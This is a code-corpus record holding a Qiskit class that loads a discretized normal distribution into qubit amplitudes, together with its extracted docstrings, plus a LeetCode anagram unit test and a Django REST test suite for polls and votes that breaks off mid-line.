sigma: Optional[Union[float, List[float]]] = None, bounds: Optional[Union[Tuple[float, float], List[Tuple[float, float]]]] = None, upto_diag: bool = False, name: str = "P(X)", ) -> None: r""" Args: num_qubits: The number of qubits used to discretize the random variable. For a 1d random variable, ``num_qubits`` is an integer, for multiple dimensions a list of integers indicating the number of qubits to use in each dimension. mu: The parameter :math:`\mu`, which is the expected value of the distribution. Can be either a float for a 1d random variable or a list of floats for a higher dimensional random variable. Defaults to 0. sigma: The parameter :math:`\sigma^2` or :math:`\Sigma`, which is the variance or covariance matrix. Default to the identity matrix of appropriate size. bounds: The truncation bounds of the distribution as tuples. For multiple dimensions, ``bounds`` is a list of tuples ``[(low0, high0), (low1, high1), ...]``. If ``None``, the bounds are set to ``(-1, 1)`` for each dimension. upto_diag: If True, load the square root of the probabilities up to multiplication with a diagonal for a more efficient circuit. name: The name of the circuit. """ warnings.warn( "`NormalDistribution` is deprecated as of version 0.17.0 and will be " "removed no earlier than 3 months after the release date. " "It moved to qiskit_finance.circuit.library.NormalDistribution.", DeprecationWarning, stacklevel=2, ) _check_dimensions_match(num_qubits, mu, sigma, bounds) _check_bounds_valid(bounds) # set default arguments dim = 1 if isinstance(num_qubits, int) else len(num_qubits) if mu is None: mu = 0 if dim == 1 else [0] * dim if sigma is None: sigma = 1 if dim == 1 else np.eye(dim) if bounds is None: bounds = (-1, 1) if dim == 1 else [(-1, 1)] * dim if not isinstance(num_qubits, list): # univariate case circuit = QuantumCircuit(num_qubits, name=name) x = np.linspace(bounds[0], bounds[1], num=2 ** num_qubits) else: # multivariate case circuit = QuantumCircuit(sum(num_qubits), name=name) # compute the evaluation points using numpy's meshgrid # indexing 'ij' yields the "column-based" indexing meshgrid = np.meshgrid( *( np.linspace(bound[0], bound[1], num=2 ** num_qubits[i]) for i, bound in enumerate(bounds) ), indexing="ij", ) # flatten into a list of points x = list(zip(*(grid.flatten() for grid in meshgrid))) from scipy.stats import multivariate_normal # compute the normalized, truncated probabilities probabilities = multivariate_normal.pdf(x, mu, sigma) normalized_probabilities = probabilities / np.sum(probabilities) # store the values, probabilities and bounds to make them user accessible self._values = x self._probabilities = normalized_probabilities self._bounds = bounds # use default the isometry (or initialize w/o resets) algorithm to construct the circuit # pylint: disable=no-member if upto_diag: circuit.isometry(np.sqrt(normalized_probabilities), circuit.qubits, None) else: from qiskit.extensions import Initialize # pylint: disable=cyclic-import initialize = Initialize(np.sqrt(normalized_probabilities)) distribution = initialize.gates_to_uncompute().inverse() circuit.compose(distribution, inplace=True) super().__init__(*circuit.qregs, name=name) try: instr = circuit.to_gate() except QiskitError: instr = circuit.to_instruction() self.compose(instr, qubits=self.qubits, inplace=True) @property def values(self) -> np.ndarray: """Return the discretized points of the random variable.""" return self._values @property def probabilities(self) -> np.ndarray: """Return the sampling probabilities for the values.""" return self._probabilities @property def bounds(self) -> Union[Tuple[float, float], List[Tuple[float, float]]]: """Return the bounds of the probability distribution.""" return self._bounds def _check_dimensions_match(num_qubits, mu, sigma, bounds): num_qubits = [num_qubits] if not isinstance(num_qubits, (list, np.ndarray)) else num_qubits dim = len(num_qubits) if mu is not None: mu = [mu] if not isinstance(mu, (list, np.ndarray)) else mu if len(mu) != dim: raise ValueError( "Dimension of mu ({}) does not match the dimension of the " "random variable specified by the number of qubits ({})" "".format(len(mu), dim) ) if sigma is not None: sigma = [[sigma]] if not isinstance(sigma, (list, np.ndarray)) else sigma if len(sigma) != dim or len(sigma[0]) != dim: raise ValueError( "Dimension of sigma ({} x {}) does not match the dimension of " "the random variable specified by the number of qubits ({})" "".format(len(sigma), len(sigma[0]), dim) ) if bounds is not None: # bit differently to cover the case the users might pass `bounds` as a single list, # e.g. [0, 1], instead of a tuple bounds = [bounds] if not isinstance(bounds[0], tuple) else bounds if len(bounds) != dim: raise ValueError( "Dimension of bounds ({}) does not match the dimension of the " "random variable specified by the number of qubits ({})" "".format(len(bounds), dim) ) def _check_bounds_valid(bounds): if bounds is None: return bounds = [bounds] if not isinstance(bounds[0], tuple) else bounds for i, bound in enumerate(bounds): if not bound[1] - bound[0] > 0: raise ValueError( "Dimension {} of the bounds are invalid, must be a non-empty " "interval where the lower bounds is smaller than the upper bound." "".format(i) )
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """A circuit that encodes a discretized normal probability distribution in qubit amplitudes.""" from typing import Tuple, Union, List, Optional import warnings import numpy as np from qiskit.circuit import QuantumCircuit from qiskit.exceptions import QiskitError class NormalDistribution(QuantumCircuit): r"""A circuit to encode a discretized normal distribution in qubit amplitudes. The probability density function of the normal distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{1}{\sqrt{2\pi\sigma^2}} e^{-\frac{(x - \mu)^2}{\sigma^2}} .. note:: The parameter ``sigma`` in this class equals the **variance**, :math:`\sigma^2` and not the standard deviation. This is for consistency with multivariate distributions, where the uppercase sigma, :math:`\Sigma`, is associated with the covariance. This circuit considers the discretized version of the normal distribution on ``2 ** num_qubits`` equidistant points, :math:`x_i`, truncated to ``bounds``. For a one-dimensional random variable, meaning `num_qubits` is a single integer, it applies the operation .. math:: \mathcal{P}_X |0\rangle^n = \sum_{i=0}^{2^n - 1} \sqrt{\mathbb{P}(x_i)} |i\rangle where :math:`n` is `num_qubits`. .. note:: The circuit loads the **square root** of the probabilities into the qubit amplitudes such that the sampling probability, which is the square of the amplitude, equals the probability of the distribution. In the multi-dimensional case, the distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{\Sigma^{-1}}{\sqrt{2\pi}} e^{-\frac{(x - \mu)^2}{\Sigma}} where :math:`\Sigma` is the covariance. To specify a multivariate normal distribution, ``num_qubits`` is a list of integers, each specifying how many qubits are used to discretize the respective dimension. The arguments ``mu`` and ``sigma`` in this case are a vector and square matrix. If for instance, ``num_qubits = [2, 3]`` then ``mu`` is a 2d vector and ``sigma`` is the :math:`2 \times 2` covariance matrix. The first dimension is discretized using 2 qubits, hence on 4 points, and the second dimension on 3 qubits, hence 8 points. Therefore the random variable is discretized on :math:`4 \times 8 = 32` points. Since, in general, it is not yet known how to efficiently prepare the qubit amplitudes to represent a normal distribution, this class computes the expected amplitudes and then uses the ``QuantumCircuit.initialize`` method to construct the corresponding circuit. This circuit is for example used in amplitude estimation applications, such as finance [1, 2], where customer demand or the return of a portfolio could be modelled using a normal distribution. Examples: >>> circuit = NormalDistribution(3, mu=1, sigma=1, bounds=(0, 2)) >>> circuit.draw() ┌────────────────────────────────────────────────────────────────────────────┐ q_0: ┤0 ├ │ │ q_1: ┤1 initialize(0.30391,0.3435,0.37271,0.38824,0.38824,0.37271,0.3435,0.30391) ├ │ │ q_2: ┤2 ├ └────────────────────────────────────────────────────────────────────────────┘ >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> circuit = NormalDistribution([2, 3], mu, sigma) >>> circuit.num_qubits 5 >>> from qiskit import QuantumCircuit >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> bounds = [(0, 1), (-1, 1)] >>> p_x = NormalDistribution([2, 3], mu, sigma, bounds) >>> circuit = QuantumCircuit(6) >>> circuit.append(p_x, list(range(5))) >>> for i in range(5): ... circuit.cry(2 ** i, i, 5) >>> circuit.draw() ┌───────┐ q_0: ┤0 ├────■───────────────────────────────────────── │ │ │ q_1: ┤1 ├────┼────────■──────────────────────────────── │ │ │ │ q_2: ┤2 P(X) ├────┼────────┼────────■─────────────────────── │ │ │ │ │ q_3: ┤3 ├────┼────────┼────────┼────────■────────────── │ │ │ │ │ │ q_4: ┤4 ├────┼────────┼────────┼────────┼────────■───── └───────┘┌───┴───┐┌───┴───┐┌───┴───┐┌───┴───┐┌───┴────┐ q_5: ─────────┤ RY(1) ├┤ RY(2) ├┤ RY(4) ├┤ RY(8) ├┤ RY(16) ├ └───────┘└───────┘└───────┘└───────┘└────────┘ References: [1]: <NAME>., <NAME>., & <NAME>. (2020). Quantum-Enhanced Simulation-Based Optimization. `arXiv:2005.10780 <http://arxiv.org/abs/2005.10780>`_ [2]: <NAME>., & <NAME>. J. (2018). Quantum Risk Analysis. `arXiv:1806.06893 <http://arxiv.org/abs/1806.06893>`_ """ def __init__( self, num_qubits: Union[int, List[int]], mu: Optional[Union[float, List[float]]] = None, sigma: Optional[Union[float, List[float]]] = None, bounds: Optional[Union[Tuple[float, float], List[Tuple[float, float]]]] = None, upto_diag: bool = False, name: str = "P(X)", ) -> None: r""" Args: num_qubits: The number of qubits used to discretize the random variable. For a 1d random variable, ``num_qubits`` is an integer, for multiple dimensions a list of integers indicating the number of qubits to use in each dimension. mu: The parameter :math:`\mu`, which is the expected value of the distribution. Can be either a float for a 1d random variable or a list of floats for a higher dimensional random variable. Defaults to 0. sigma: The parameter :math:`\sigma^2` or :math:`\Sigma`, which is the variance or covariance matrix. Default to the identity matrix of appropriate size. bounds: The truncation bounds of the distribution as tuples. For multiple dimensions, ``bounds`` is a list of tuples ``[(low0, high0), (low1, high1), ...]``. If ``None``, the bounds are set to ``(-1, 1)`` for each dimension. upto_diag: If True, load the square root of the probabilities up to multiplication with a diagonal for a more efficient circuit. name: The name of the circuit. """ warnings.warn( "`NormalDistribution` is deprecated as of version 0.17.0 and will be " "removed no earlier than 3 months after the release date. " "It moved to qiskit_finance.circuit.library.NormalDistribution.", DeprecationWarning, stacklevel=2, ) _check_dimensions_match(num_qubits, mu, sigma, bounds) _check_bounds_valid(bounds) # set default arguments dim = 1 if isinstance(num_qubits, int) else len(num_qubits) if mu is None: mu = 0 if dim == 1 else [0] * dim if sigma is None: sigma = 1 if dim == 1 else np.eye(dim) if bounds is None: bounds = (-1, 1) if dim == 1 else [(-1, 1)] * dim if not isinstance(num_qubits, list): # univariate case circuit = QuantumCircuit(num_qubits, name=name) x = np.linspace(bounds[0], bounds[1], num=2 ** num_qubits) else: # multivariate case circuit = QuantumCircuit(sum(num_qubits), name=name) # compute the evaluation points using numpy's meshgrid # indexing 'ij' yields the "column-based" indexing meshgrid = np.meshgrid( *( np.linspace(bound[0], bound[1], num=2 ** num_qubits[i]) for i, bound in enumerate(bounds) ), indexing="ij", ) # flatten into a list of points x = list(zip(*(grid.flatten() for grid in meshgrid))) from scipy.stats import multivariate_normal # compute the normalized, truncated probabilities probabilities = multivariate_normal.pdf(x, mu, sigma) normalized_probabilities = probabilities / np.sum(probabilities) # store the values, probabilities and bounds to make them user accessible self._values = x self._probabilities = normalized_probabilities self._bounds = bounds # use default the isometry (or initialize w/o resets) algorithm to construct the circuit # pylint: disable=no-member if upto_diag: circuit.isometry(np.sqrt(normalized_probabilities), circuit.qubits, None) else: from qiskit.extensions import Initialize # pylint: disable=cyclic-import initialize = Initialize(np.sqrt(normalized_probabilities)) distribution = initialize.gates_to_uncompute().inverse() circuit.compose(distribution, inplace=True) super().__init__(*circuit.qregs, name=name) try: instr = circuit.to_gate() except QiskitError: instr = circuit.to_instruction() self.compose(instr, qubits=self.qubits, inplace=True) @property def values(self) -> np.ndarray: """Return the discretized points of the random variable.""" return self._values @property def probabilities(self) -> np.ndarray: """Return the sampling probabilities for the values.""" return self._probabilities @property def bounds(self) -> Union[Tuple[float, float], List[Tuple[float, float]]]: """Return the bounds of the probability distribution.""" return self._bounds def _check_dimensions_match(num_qubits, mu, sigma, bounds): num_qubits = [num_qubits] if not isinstance(num_qubits, (list, np.ndarray)) else num_qubits dim = len(num_qubits) if mu is not None: mu = [mu] if not isinstance(mu, (list, np.ndarray)) else mu if len(mu) != dim: raise ValueError( "Dimension of mu ({}) does not match the dimension of the " "random variable specified by the number of qubits ({})" "".format(len(mu), dim) ) if sigma is not None: sigma = [[sigma]] if not isinstance(sigma, (list, np.ndarray)) else sigma if len(sigma) != dim or len(sigma[0]) != dim: raise ValueError( "Dimension of sigma ({} x {}) does not match the dimension of " "the random variable specified by the number of qubits ({})" "".format(len(sigma), len(sigma[0]), dim) ) if bounds is not None: # bit differently to cover the case the users might pass `bounds` as a single list, # e.g. [0, 1], instead of a tuple bounds = [bounds] if not isinstance(bounds[0], tuple) else bounds if len(bounds) != dim: raise ValueError( "Dimension of bounds ({}) does not match the dimension of the " "random variable specified by the number of qubits ({})" "".format(len(bounds), dim) ) def _check_bounds_valid(bounds): if bounds is None: return bounds = [bounds] if not isinstance(bounds[0], tuple) else bounds for i, bound in enumerate(bounds): if not bound[1] - bound[0] > 0: raise ValueError( "Dimension {} of the bounds are invalid, must be a non-empty " "interval where the lower bounds is smaller than the upper bound." "".format(i) )
en
0.652994
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. A circuit that encodes a discretized normal probability distribution in qubit amplitudes. A circuit to encode a discretized normal distribution in qubit amplitudes. The probability density function of the normal distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{1}{\sqrt{2\pi\sigma^2}} e^{-\frac{(x - \mu)^2}{\sigma^2}} .. note:: The parameter ``sigma`` in this class equals the **variance**, :math:`\sigma^2` and not the standard deviation. This is for consistency with multivariate distributions, where the uppercase sigma, :math:`\Sigma`, is associated with the covariance. This circuit considers the discretized version of the normal distribution on ``2 ** num_qubits`` equidistant points, :math:`x_i`, truncated to ``bounds``. For a one-dimensional random variable, meaning `num_qubits` is a single integer, it applies the operation .. math:: \mathcal{P}_X |0\rangle^n = \sum_{i=0}^{2^n - 1} \sqrt{\mathbb{P}(x_i)} |i\rangle where :math:`n` is `num_qubits`. .. note:: The circuit loads the **square root** of the probabilities into the qubit amplitudes such that the sampling probability, which is the square of the amplitude, equals the probability of the distribution. In the multi-dimensional case, the distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{\Sigma^{-1}}{\sqrt{2\pi}} e^{-\frac{(x - \mu)^2}{\Sigma}} where :math:`\Sigma` is the covariance. To specify a multivariate normal distribution, ``num_qubits`` is a list of integers, each specifying how many qubits are used to discretize the respective dimension. The arguments ``mu`` and ``sigma`` in this case are a vector and square matrix. If for instance, ``num_qubits = [2, 3]`` then ``mu`` is a 2d vector and ``sigma`` is the :math:`2 \times 2` covariance matrix. The first dimension is discretized using 2 qubits, hence on 4 points, and the second dimension on 3 qubits, hence 8 points. Therefore the random variable is discretized on :math:`4 \times 8 = 32` points. Since, in general, it is not yet known how to efficiently prepare the qubit amplitudes to represent a normal distribution, this class computes the expected amplitudes and then uses the ``QuantumCircuit.initialize`` method to construct the corresponding circuit. This circuit is for example used in amplitude estimation applications, such as finance [1, 2], where customer demand or the return of a portfolio could be modelled using a normal distribution. Examples: >>> circuit = NormalDistribution(3, mu=1, sigma=1, bounds=(0, 2)) >>> circuit.draw() ┌────────────────────────────────────────────────────────────────────────────┐ q_0: ┤0 ├ │ │ q_1: ┤1 initialize(0.30391,0.3435,0.37271,0.38824,0.38824,0.37271,0.3435,0.30391) ├ │ │ q_2: ┤2 ├ └────────────────────────────────────────────────────────────────────────────┘ >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> circuit = NormalDistribution([2, 3], mu, sigma) >>> circuit.num_qubits 5 >>> from qiskit import QuantumCircuit >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> bounds = [(0, 1), (-1, 1)] >>> p_x = NormalDistribution([2, 3], mu, sigma, bounds) >>> circuit = QuantumCircuit(6) >>> circuit.append(p_x, list(range(5))) >>> for i in range(5): ... circuit.cry(2 ** i, i, 5) >>> circuit.draw() ┌───────┐ q_0: ┤0 ├────■───────────────────────────────────────── │ │ │ q_1: ┤1 ├────┼────────■──────────────────────────────── │ │ │ │ q_2: ┤2 P(X) ├────┼────────┼────────■─────────────────────── │ │ │ │ │ q_3: ┤3 ├────┼────────┼────────┼────────■────────────── │ │ │ │ │ │ q_4: ┤4 ├────┼────────┼────────┼────────┼────────■───── └───────┘┌───┴───┐┌───┴───┐┌───┴───┐┌───┴───┐┌───┴────┐ q_5: ─────────┤ RY(1) ├┤ RY(2) ├┤ RY(4) ├┤ RY(8) ├┤ RY(16) ├ └───────┘└───────┘└───────┘└───────┘└────────┘ References: [1]: <NAME>., <NAME>., & <NAME>. (2020). Quantum-Enhanced Simulation-Based Optimization. `arXiv:2005.10780 <http://arxiv.org/abs/2005.10780>`_ [2]: <NAME>., & <NAME>. J. (2018). Quantum Risk Analysis. `arXiv:1806.06893 <http://arxiv.org/abs/1806.06893>`_ Args: num_qubits: The number of qubits used to discretize the random variable. For a 1d random variable, ``num_qubits`` is an integer, for multiple dimensions a list of integers indicating the number of qubits to use in each dimension. mu: The parameter :math:`\mu`, which is the expected value of the distribution. Can be either a float for a 1d random variable or a list of floats for a higher dimensional random variable. Defaults to 0. sigma: The parameter :math:`\sigma^2` or :math:`\Sigma`, which is the variance or covariance matrix. Default to the identity matrix of appropriate size. bounds: The truncation bounds of the distribution as tuples. For multiple dimensions, ``bounds`` is a list of tuples ``[(low0, high0), (low1, high1), ...]``. If ``None``, the bounds are set to ``(-1, 1)`` for each dimension. upto_diag: If True, load the square root of the probabilities up to multiplication with a diagonal for a more efficient circuit. name: The name of the circuit. # set default arguments # univariate case # multivariate case # compute the evaluation points using numpy's meshgrid # indexing 'ij' yields the "column-based" indexing # flatten into a list of points # compute the normalized, truncated probabilities # store the values, probabilities and bounds to make them user accessible # use default the isometry (or initialize w/o resets) algorithm to construct the circuit # pylint: disable=no-member # pylint: disable=cyclic-import Return the discretized points of the random variable. Return the sampling probabilities for the values. Return the bounds of the probability distribution. # bit differently to cover the case the users might pass `bounds` as a single list, # e.g. [0, 1], instead of a tuple
3.175323
3
exercises/0242-ValidAnagram/valid_anagram_test.py
tqa236/leetcode-solutions
1
6627899
<reponame>tqa236/leetcode-solutions<gh_stars>1-10 import unittest from valid_anagram import Solution class Test(unittest.TestCase): def test_1(self): solution = Solution() self.assertEqual(solution.isAnagram("anagram", "nagaram"), True) def test_2(self): solution = Solution() self.assertEqual(solution.isAnagram("rat", "car"), False) if __name__ == "__main__": unittest.main()
import unittest from valid_anagram import Solution class Test(unittest.TestCase): def test_1(self): solution = Solution() self.assertEqual(solution.isAnagram("anagram", "nagaram"), True) def test_2(self): solution = Solution() self.assertEqual(solution.isAnagram("rat", "car"), False) if __name__ == "__main__": unittest.main()
none
1
3.362917
3
backend/app/tests/test_pollView.py
ExZos/Mound
0
6627900
from django.test import TestCase from rest_framework import status from rest_framework.test import APIClient class getPendingPollsInSpaceTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 3}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': False}, format='json') def test_get_from_space_w_2_pending_polls(self): response = self.client.get('/poll/getPendingInSpace/1/') self.assertEqual(len(response.data), 2) def test_get_from_space_w_no_pending_polls(self): response = self.client.get('/poll/getPendingInSpace/2/') self.assertEqual(len(response.data), 0) def test_get_from_space_w_1_pending_poll(self): response = self.client.get('/poll/getPendingInSpace/3/') self.assertEqual(len(response.data), 1) def test_get_from_missing_space(self): response = self.client.get('/poll/getPendingInSpace/4/') self.assertEqual(len(response.data), 0) class getPendingPollsByUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2, 'status': True, 'name': 'Yun'}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2, 'status': True, 'name': 'Xiao'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3, 'status': True, 'name': 'Vivian'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 3, 'status': False, 'name': 'Ua'}, format='json') def test_get_from_user_w_2_pending_polls(self): response = self.client.get('/poll/getPendingByUser/1/') self.assertEqual(len(response.data), 2) def test_get_from_user_w_no_pending_polls(self): response = self.client.get('/poll/getPendingByUser/2/') self.assertEqual(len(response.data), 0) def test_get_from_user_w_1_pending_poll(self): response = self.client.get('/poll/getPendingByUser/3/') self.assertEqual(len(response.data), 1) def test_get_from_missing_user(self): response = self.client.get('/poll/getPendingByUser/4/') self.assertEqual(len(response.data), 0) class getPendingUnvotedPollsForUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 1, 'status': False}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 2, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 3, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 5, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 6, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 7, 'user': 2, 'result': True}, format='json') def test_get_for_user_w_1_unvoted_poll(self): response = self.client.get('/poll/getPendingUnvotedForUser/1/') self.assertEqual(len(response.data), 1) def test_get_for_user_w_3_unvoted_polls(self): response = self.client.get('/poll/getPendingUnvotedForUser/2/') self.assertEqual(len(response.data), 3) def test_get_for_user_w_4_unvoted_polls(self): response = self.client.get('/poll/getPendingUnvotedForUser/3/') self.assertEqual(len(response.data), 4) def test_get_for_missing_user(self): response = self.client.get('/poll/getPendingUnvotedForUser/4/') self.assertEqual(len(response.data), 0) class getPendingJoinPollInSpaceByNameTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 1, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 1, 'status': True, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': False, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'name': 'Xiao'}, format='json') def test_get_unique_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/3/Xiao/') self.assertEqual(response.status_code, status.HTTP_200_OK) def test_get_recurring_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/1/Zaray/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertIn('space', response.data) self.assertEqual(response.data['space'], 1) def test_fail_get_missing_but_recurring_name(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/1/Xiao/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_recurring_name_from_missing_space(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/4/Zaray/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_join_poll(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/2/Yon/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_pending_poll(self): response = self.client.get('/poll/getPendingJoinInSpaceByName/2/Zaray/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class getNamePollResultsInSpaceByUserTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Daphne', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 3}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 3}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 1, 'name': 'Zaray'}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 2}, format='json') self.client.post('/api/polls/', {'space': 1, 'user': 3, 'status': True, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 2, 'user': 6, 'name': 'Yon'}, format='json') self.client.post('/api/polls/', {'space': 3, 'user': 8, 'name': 'Xiao'}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 3, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 4, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 5, 'result': False}, format='json') self.client.post('/api/votes/', {'poll': 4, 'user': 7, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 5, 'user': 9, 'result': True}, format='json') def test_get_results_3u_1p_2n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/1/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 3) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 2) self.assertNotIn('user', response.data) def test_get_results_2u_1p_1n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/2/6/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 2) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 1) self.assertNotIn('user', response.data) def test_get_results_1u_1p_0n(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/3/8/') self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['userCount'], 1) self.assertEqual(response.data['positiveVoteCount'], 1) self.assertEqual(response.data['negativeVoteCount'], 0) self.assertIn('user', response.data) def test_fail_get_by_user_w_no_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/4/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_for_missing_user(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/10/') def test_fail_get_non_name_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/2/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def test_fail_get_non_pending_poll(self): response = self.client.get('/poll/getNameResultsInSpaceByUser/1/3/') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) class getJoinPollResultsTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 1}, format='json') self.client.post('/api/users/', {'name': 'Alex', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Bob', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Celine', 'space': 2}, format='json') self.client.post('/api/users/', {'name': 'Delphine', 'space': 2}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 1, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 2, 'result': True}, format='json') self.client.post('/api/votes/', {'poll': 1, 'user': 3, 